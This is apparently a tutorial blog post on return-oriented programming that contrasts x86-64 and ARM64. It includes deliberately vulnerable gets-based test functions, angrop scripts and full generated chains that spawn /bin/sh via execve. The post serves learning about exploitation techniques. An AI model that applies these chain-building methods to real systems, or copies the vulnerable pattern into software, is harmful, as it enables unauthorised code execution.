x86-64 vs ARM64 ROP

Introduction

Return-oriented programming (ROP) is fairly trivial for architectures like x86-64 with stack-based returns which transfer control to a return address located on the stack. However, on ARM64, software can't write directly to the program counter. It can only be updated through branches and exception entries or returns. This makes stack-based returns in the x86-64 sense impossible.

Naturally, this key architectural difference means that the structure of ROP chains differs between x86-64 and ARM64. It also makes manually crafting ARM64 chains far less practical, which is where ROP chain generators come in.

ROP Chain Structure

On x86-64, typical ROP gadgets end with a ret instruction, which pops the value at the top of the stack (pointed to by rsp) into the program counter rip. This makes gadget chaining easy since the stack pointer, which functions as a quasi program counter, is automatically advanced to the next gadget on the stack.

Below is a hypothetical stack view of an x86-64 ROP chain that writes 0xdeadbeef to rdi and 0xfeedface to rsi:

0x0000000000000000: pop %rdi; ret
0x0000000000000008: 0xdeadbeef
0x0000000000000010: pop %rsi; ret
0x0000000000000018: 0xfeedface

Here's how the ROP chain executes:

  1. The stack pointer begins at 0x8.
  2. pop %rdi pops 0xdeadbeef into rdi. Now the stack pointer is at 0x10.
  3. ret transfers control to the address at 0x10. Now the stack pointer is at 0x18.
  4. pop %rsi pops 0xfeedface into rsi. Now the stack pointer is at 0x20.
  5. ret transfers control to the address at 0x20. Now the stack pointer is at 0x28.
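
The steps above can be replayed with a toy model. This is only a sketch: the stack is a Python dict keyed by address, and a slot that holds a gadget address is represented by the gadget's instruction list itself. The names run_x86_chain, POP_RDI and POP_RSI are made up for illustration.

```python
# Toy model of the x86-64 chain above (illustrative only, not an emulator).
# A gadget is a list of (op, operand) tuples; data slots hold plain integers.
POP_RDI = [("pop", "rdi"), ("ret", None)]
POP_RSI = [("pop", "rsi"), ("ret", None)]

stack = {0x00: POP_RDI, 0x08: 0xDEADBEEF, 0x10: POP_RSI, 0x18: 0xFEEDFACE}


def run_x86_chain(stack, first_gadget_slot=0x00):
    regs = {}
    # Control reached the first gadget through a ret, so rsp already
    # points just past the slot that held the gadget's address.
    rsp = first_gadget_slot + 8
    gadget = stack[first_gadget_slot]
    while gadget is not None:
        next_gadget = None
        for op, operand in gadget:
            if op == "pop":
                regs[operand] = stack[rsp]  # load the slot at rsp
                rsp += 8                    # pop advances rsp by one slot
            elif op == "ret":
                next_gadget = stack.get(rsp)  # None once the chain runs out
                rsp += 8                      # ret also advances rsp
        gadget = next_gadget
    return regs, rsp


regs, rsp = run_x86_chain(stack)
print({name: hex(value) for name, value in regs.items()}, hex(rsp))
```

Note that the model never has to be told where the next gadget lives: ret finds it at rsp every time, which is exactly the self-chaining behaviour the walkthrough describes.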

On architectures with stack-based returns, ROP chains automatically chain themselves together since the return instruction transfers control to the next gadget on the stack. You just place all your gadgets on the stack, padding where necessary, and they execute in that order.

ARM64 has a ret instruction too. However, instead of popping a return address off the stack, it branches to the address held in the link register lr. Simple gadgets still end with a ret instruction, but you have to advance to the next gadget manually by loading its address into lr within the gadget. Since ret is really just a branch, you can substitute it with any branch instruction as long as you control the destination.

Below is a hypothetical stack view of an ARM64 ROP chain that writes 0xdeadbeef to x0 and 0xfeedface to x1:

0x0000000000000000: ldr x0, [sp]; ldr lr, [sp, #0x8], #0x10; ret
0x0000000000000008: 0xdeadbeef
0x0000000000000010: ldr x1, [sp]; ldr lr, [sp, #0x8], #0x10; ret
0x0000000000000018: 0xfeedface

Here's how the ROP chain executes:

  1. The stack pointer begins at 0x8.
  2. ldr x0, [sp] loads 0xdeadbeef into x0.
  3. ldr lr, [sp, #0x8], #0x10 loads the value at 0x10 into lr and adds 0x10 to the stack pointer. Now the stack pointer is at 0x18.
  4. ret transfers control to the address in lr.
  5. ldr x1, [sp] loads 0xfeedface into x1.
  6. ldr lr, [sp, #0x8], #0x10 loads the value at 0x20 into lr and adds 0x10 to the stack pointer. Now the stack pointer is at 0x28.
  7. ret transfers control to the address in lr.

Notice how the gadgets have to manually chain themselves together. They have to get the address of the next gadget into lr before ret is executed.
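
The same kind of toy model makes the difference visible. Again this is only a sketch under the same assumptions as the hypothetical stack view: gadget slots hold the gadget's instruction list, and the names make_gadget and run_arm64_chain are made up for illustration.

```python
# Toy model of the ARM64 chain above (illustrative only, not an emulator).
# Each instruction is (op, dst, offset, writeback).
def make_gadget(reg):
    return [
        ("ldr", reg, 0x0, 0x0),    # ldr reg, [sp]
        ("ldr", "lr", 0x8, 0x10),  # ldr lr, [sp, #0x8], #0x10 (hypothetical form)
        ("ret", None, 0x0, 0x0),   # ret: branch to whatever lr holds
    ]


SET_X0 = make_gadget("x0")
SET_X1 = make_gadget("x1")

stack = {0x00: SET_X0, 0x08: 0xDEADBEEF, 0x10: SET_X1, 0x18: 0xFEEDFACE}


def run_arm64_chain(stack, first_gadget_slot=0x00):
    regs = {}
    sp = first_gadget_slot + 8
    gadget = stack[first_gadget_slot]
    while gadget is not None:
        next_gadget = None
        for op, dst, offset, writeback in gadget:
            if op == "ldr":
                regs[dst] = stack.get(sp + offset)  # load relative to sp
                sp += writeback                     # optional post-increment
            elif op == "ret":
                # ret never touches the stack; it only follows lr.
                next_gadget = regs["lr"]
        gadget = next_gadget
    return regs, sp


regs, sp = run_arm64_chain(stack)
print(hex(regs["x0"]), hex(regs["x1"]), hex(sp))
```

If you delete the ldr lr line from make_gadget, the model raises a KeyError at the first ret because lr was never set. That is the toy equivalent of a chain that can't continue.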

Unfortunately, you'll never find gadgets like these in the wild: gadgets which perfectly advance the stack pointer up the stack. The offsets you see here for loads and stores were chosen for simplicity, and the ldr lr form even combines an immediate offset with post-index writeback, which isn't a real A64 addressing mode. Usually, you'll find that the stack offsets in loads and stores can be rather large, resulting in a larger chain size due to padding.

ROP Chain Generation

Normally, I write ROP chains manually. This involves running ROPgadget on the relevant binaries and then combing through their gadgets to build up a chain. This works fine for architectures where you're likely to find simple gadgets with no side effects or dependencies. However, these sorts of gadgets rarely exist in ARM64 binaries.

Take the glibc on my system for example, a supposed trove of gadgets. On x86-64, say you wanted to set rdi to a value. That's no problem, pop rdi; ret exists. Want to set rsi too? pop rsi; ret exists. On ARM64, say you want to set x0 to a value. Well you have ldr x0, [sp, #0x10]; ldp fp, lr, [sp], #0x20; ret. But then say you want to set x1 too. Now the gadgets become more constrained. ldr x1, [sp, #0x20]; add sp, sp, #0xb0; br x16 was literally the nicest gadget I could find. However, it requires you to control x16 to continue your chain. So that's yet another gadget you'll have to find. And what if that gadget requires you to control a different register? The dependencies just keep on growing.

I wondered if there was a better way to write ROP chains, something more automated. Like, was there an angr but for ROP? A tool where I could say "here is a set of gadgets, now find the sequence of gadgets which results in this state". Well, it turns out that that exact tool exists: angrop.

angrop's made by the same great people who made angr. It's built on top of angr's symbolic execution engine, and uses constraint solving for generating ROP chains. Most importantly, it understands the effects of gadgets.

I wrote test programs for x86-64 and ARM64 to test angrop's ROP chain generation. Each test program was statically linked with glibc and had a vulnerable function vuln which called gets with the current stack frame's base as its argument. I wanted to see if I could generate a ROP chain which would write "/bin/sh" to writable memory and then make an execve system call with it as the path. It's important to note that while the test programs are statically linked with glibc, they don't include all of glibc's gadgets. Nevertheless, there'll still be more than enough to play with.

Here's the architecture-independent program:

extern void vuln();

int main() {
  vuln();
}

Here's the x86-64 vulnerable function:

.global vuln
.type vuln, @function
vuln:
  push %rbp
  mov %rsp, %rbp
  mov %rbp, %rdi
  call gets
  pop %rbp
  ret
.size vuln, .-vuln

And here's the ARM64 vulnerable function:

.global vuln
.type vuln, @function
vuln:
  stp fp, lr, [sp, #-16]!
  mov x0, sp
  bl gets
  ldp fp, lr, [sp], #16 
  ret
.size vuln, .-vuln
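
In both functions, gets starts writing at the saved frame pointer, and the saved return address (the return address on x86-64, the saved lr on ARM64) sits 8 bytes above it. Under that reading of the assembly, a payload is 8 filler bytes followed by the chain. Here's a minimal sketch of that layout. The helper name build_payload and the example addresses are hypothetical.

```python
import struct


def build_payload(chain_words, saved_fp=0x4141414141414141):
    """Lay out input for vuln: one slot for the saved frame pointer,
    then the chain as little-endian 64-bit words. The first chain word
    lands on the saved return address (x86-64) or saved lr (ARM64)."""
    words = [saved_fp] + list(chain_words)
    payload = struct.pack("<%dQ" % len(words), *words)
    # gets stops reading at a newline, so a 0x0a byte would truncate the chain.
    if b"\n" in payload:
        raise ValueError("payload contains a newline byte; gets would stop there")
    return payload


# Hypothetical two-word chain: a gadget address followed by a data word.
payload = build_payload([0x401000, 0xDEADBEEF])
print(payload.hex())
```

The newline check is worth keeping even in a throwaway script, since an address or constant containing 0x0a silently cuts the chain short.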

Each program using angrop typically begins with the following:

import angr, angrop

p = angr.Project("pathname")
rop = p.analyses.ROP()

Similar to using angr, the first step is to load a binary into a project. Then, to use angrop, you need to instantiate an angrop.ROP object for gadget finding.

At this point, angrop isn't aware of any gadgets. You can either search for them in the binary or import them. You'll need to search for them in the binary at least once. However, since searching takes a bit of time and there's no gadget cache, you'll also want to save the gadgets:

rop.find_gadgets()
rop.save_gadgets("gadgets")

Now on subsequent runs, you can replace the above lines with:

rop.load_gadgets("gadgets")
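
The search-once-then-load pattern can be folded into one helper so the script doesn't need editing between runs. This is a sketch that only relies on the three methods shown above. The helper name load_or_find_gadgets and its return values are made up for illustration.

```python
import os


def load_or_find_gadgets(rop, cache_path="gadgets"):
    """Load gadgets from cache_path if it exists, otherwise search and save.

    `rop` is expected to be the object returned by p.analyses.ROP().
    """
    if os.path.exists(cache_path):
        rop.load_gadgets(cache_path)
        return "loaded"
    rop.find_gadgets()
    rop.save_gadgets(cache_path)
    return "searched"
```

One caveat with this sketch: it has no way of knowing that the cache is stale. If you change the binary or the search options, delete the file so the gadgets are searched for again.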

With these gadgets you can construct a ROP chain using angr's symbolic execution engine. angrop provides helper functions which among other things can set registers, call functions, and write to memory.

Here's how you'd create the x86-64 ROP chain:

obj = p.loader.main_object
segment = next(s for s in obj.segments if s.is_writable)
syscall_gadget = next(g for g in rop.syscall_gadgets if g.dstr() == "syscall ; ret ")

chain = rop.write_to_mem(segment.vaddr, b"/bin/sh\x00")
chain += rop.set_regs(rax=59, rdi=segment.vaddr, rsi=0, rdx=0)
chain.add_gadget(syscall_gadget)

And here's how you'd create the ARM64 ROP chain:

obj = p.loader.main_object
segment = next(s for s in obj.segments if s.is_writable)
syscall_gadget = next(g for g in rop.syscall_gadgets if g.dstr() == "svc #0; ret ")

chain = rop.write_to_mem(segment.vaddr, b"/bin/sh\x00")
chain += rop.set_regs(x8=221, x0=segment.vaddr, x1=0, x2=0)
chain.add_gadget(syscall_gadget)
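
The two snippets differ only in the syscall gadget string and in the registers passed to set_regs. That second difference is just the Linux execve calling convention for each architecture, which can be written down as data. This is a sketch: the table keys "x86_64" and "aarch64" and the helper name execve_regs are arbitrary labels chosen here.

```python
# Linux execve conventions as used in the two snippets above:
# the syscall-number register, its value, and the three argument registers.
EXECVE = {
    "x86_64": {"nr_reg": "rax", "nr": 59, "args": ("rdi", "rsi", "rdx")},
    "aarch64": {"nr_reg": "x8", "nr": 221, "args": ("x0", "x1", "x2")},
}


def execve_regs(arch, path_addr):
    """Return register assignments for execve(path_addr, NULL, NULL)."""
    conv = EXECVE[arch]
    path_reg, argv_reg, envp_reg = conv["args"]
    return {conv["nr_reg"]: conv["nr"], path_reg: path_addr, argv_reg: 0, envp_reg: 0}


print(execve_regs("aarch64", 0x490000))
```

Since set_regs takes its registers as keyword arguments, the resulting dict could be passed along as rop.set_regs(**execve_regs("aarch64", segment.vaddr)).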

The above ROP chain generation code will only work if there are sufficient gadgets to satisfy the ROP chain's constraints. This depends entirely on the gadgets the gadget finder finds. The gadget finder class angrop.ROP accepts several arguments in its constructor to configure the search criteria. I found that the defaults worked perfectly for x86-64. However, that wasn't the case with ARM64.

I had to change the instantiation to:

rop = p.analyses.ROP(fast_mode=False, max_block_size=64)

The issue was caused by the default value of the max_block_size argument, which controls the maximum gadget length in bytes. For x86-64, the default size is 12. This is fine since x86-64 gadgets aren't typically long and x86-64 has variable-length instructions. For ARM64, the default size is 40. With a fixed instruction length of 4 bytes, this means a gadget can contain at most 10 instructions. This may seem like enough, but as you've seen, ARM64 gadgets aren't pretty: they can be long. And in glibc, long they are.

I noticed that the gadget finder wasn't able to set x0 even though such a gadget existed. However, said gadget was over 10 instructions long! I found that setting the value to 64, which allows up to 16 instructions, was more reasonable and found better, albeit more complicated, gadgets. I also found that I had to set fast_mode to False to prevent max_block_size from being overridden. The only trade-off of a larger maximum block size was search speed, but that's fine since you only have to search once.
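
Because every ARM64 instruction is 4 bytes, the byte limit converts directly into an instruction limit. A tiny sketch of that arithmetic (the helper name is made up):

```python
A64_INSN_BYTES = 4  # every A64 instruction is 4 bytes long


def max_gadget_instructions(max_block_size, insn_bytes=A64_INSN_BYTES):
    """Longest gadget, in instructions, that fits in max_block_size bytes."""
    return max_block_size // insn_bytes


print(max_gadget_instructions(40), max_gadget_instructions(64))
```

The same conversion doesn't work for x86-64, where instruction lengths vary.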

In the end, for both architectures, angrop was able to successfully generate ROP chains to pop a shell.

Here's the generated x86-64 ROP chain:

0x0000000000000000: pop %rdi; ret
0x0000000000000008: 0x497f68
0x0000000000000010: pop %rsi; add $0x9340, %eax; ret
0x0000000000000018: 0x68732f6e69622f
0x0000000000000020: mov %rsi, 0x98(%rdi); ret
0x0000000000000028: pop %rdi; ret
0x0000000000000030: 0x498000
0x0000000000000038: pop %rsi; ret
0x0000000000000040: 0x0
0x0000000000000048: pop %rax; pop %rdx; pop %rbx; ret
0x0000000000000050: 0x3b
0x0000000000000058: 0x0
0x0000000000000060: 0x0
0x0000000000000068: syscall; ret
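
The constants in this chain can be checked by hand. The following sketch only reuses values from the listing above and decodes where they come from:

```python
# "/bin/sh" plus its NUL terminator, read as one little-endian 64-bit word.
binsh = int.from_bytes(b"/bin/sh\x00", "little")

# The store gadget writes rsi to rdi + 0x98, with rdi popped as 0x497f68.
store_target = 0x497F68 + 0x98

# The value popped into rax is the execve syscall number.
execve_nr = 0x3B

print(hex(binsh), hex(store_target), execve_nr)
```

So the first three gadgets write the string to 0x498000, and the rest of the chain points rdi at that same address before the syscall.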

And here's the ARM64 ROP chain:

0x0000000000000000: ldr x2, [sp, #0x18]; ldp fp, lr, [sp], #0x20; add x0, x0, x2; ret
0x0000000000000008: 0x0
0x0000000000000010: ldr x3, [sp, #0x10]; mov x0, x3; ldp fp, lr, [sp], #0x40; ret
0x0000000000000018: 0x0
0x0000000000000020: 0x48ffd0
0x0000000000000028: 0x0
0x0000000000000030: str x0, [x2, #0x30]; mov w0, #0; ldp fp, lr, [sp], #0x20; ret
0x0000000000000038: 0x68732f6e69622f
0x0000000000000040: 0x0
0x0000000000000048: 0x0
0x0000000000000050: 0x0
0x0000000000000058: 0x0
0x0000000000000060: 0x0
0x0000000000000068: 0x0
0x0000000000000070: ldr x2, [sp, #0x18]; ldp fp, lr, [sp], #0x20; mov x0, x2; ret
0x0000000000000078: 0x0
0x0000000000000080: 0x0
0x0000000000000088: 0x0
0x0000000000000090: mov x16, x0; ldp q0, q1, [sp, #0x50]; ldp q2, q3, [sp, #0x70]; ldp q4, q5, [sp, #0x90]; ldp q6, q7, [sp, #0xb0]; ldp x0, x1, [sp, #0x40]; ldp x2, x3, [sp, #0x30]; ldp x4, x5, [sp, #0x20]; ldp x6, x7, [sp, #0x10]; ldp x8, x9, [sp], #0xd0; ldp x17, lr, [sp], #0x10; br x16
0x0000000000000098: 0x0
0x00000000000000a0: svc #0; ret
0x00000000000000a8: 0xdd
0x00000000000000b0: 0x0
0x00000000000000b8: 0x0
0x00000000000000c0: 0x0
0x00000000000000c8: 0x0
0x00000000000000d0: 0x0
0x00000000000000d8: 0x0
0x00000000000000e0: 0x0
0x00000000000000e8: 0x490000
0x00000000000000f0: 0x0
0x00000000000000f8: 0x0
0x0000000000000100: 0x0
0x0000000000000108: 0x0
0x0000000000000110: 0x0
0x0000000000000118: 0x0
0x0000000000000120: 0x0
0x0000000000000128: 0x0
0x0000000000000130: 0x0
0x0000000000000138: 0x0
0x0000000000000140: 0x0
0x0000000000000148: 0x0
0x0000000000000150: 0x0
0x0000000000000158: 0x0
0x0000000000000160: 0x0
0x0000000000000168: 0x0
0x0000000000000170: 0x0
0x0000000000000178: 0x0
0x0000000000000180: 0x0
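
A little arithmetic on the two listings shows how much the padding costs. This sketch only counts the 8-byte entries in each listing and reuses constants that appear in them:

```python
SLOT_BYTES = 8

x86_slots = 14    # entries in the x86-64 listing
arm64_slots = 49  # entries in the ARM64 listing (0x0 through 0x180)

x86_bytes = x86_slots * SLOT_BYTES
arm64_bytes = arm64_slots * SLOT_BYTES

# x2 is loaded with 0x48ffd0 and the path pointer loaded into x0 is 0x490000,
# so the store gadget has to write at this offset from x2.
store_offset = 0x490000 - 0x48FFD0

# The value loaded into x8 is the ARM64 execve syscall number.
execve_nr = 0xDD

print(x86_bytes, arm64_bytes, arm64_bytes / x86_bytes, hex(store_offset), execve_nr)
```

Both chains do the same job, but the ARM64 one is 3.5 times larger, and most of its entries are zero padding that the gadgets' large stack offsets skip over.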

Both are impressive, but I was far more impressed by the ARM64 chain. It's faster to just throw the chain at the binary than to attempt to statically analyze it. I mean, just look at the mammoth gadget at 0x90! It's like looking at the output of a compiler. Some things just aren't immediately clear at all. But the compiler, or in this case angrop, can see right through it.

Conclusion

I've come to the conclusion that practical ROP is just harder on ARM64 than on x86-64. Now I'm no ROP historian, but maybe the technique was first discovered on an architecture with stack-based returns. I don't know, a part of me just feels like it was made for the x86 architecture family.

So, if you're ever knee-deep in crafting an x86-64 ROP chain and things are getting a bit hairy, just remember that it could be worse. You could be knee-deep in crafting an ARM64 ROP chain without angrop.